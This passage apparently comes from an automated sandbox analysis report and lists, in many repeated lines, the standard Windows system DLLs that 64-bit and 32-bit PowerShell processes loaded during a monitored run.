                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
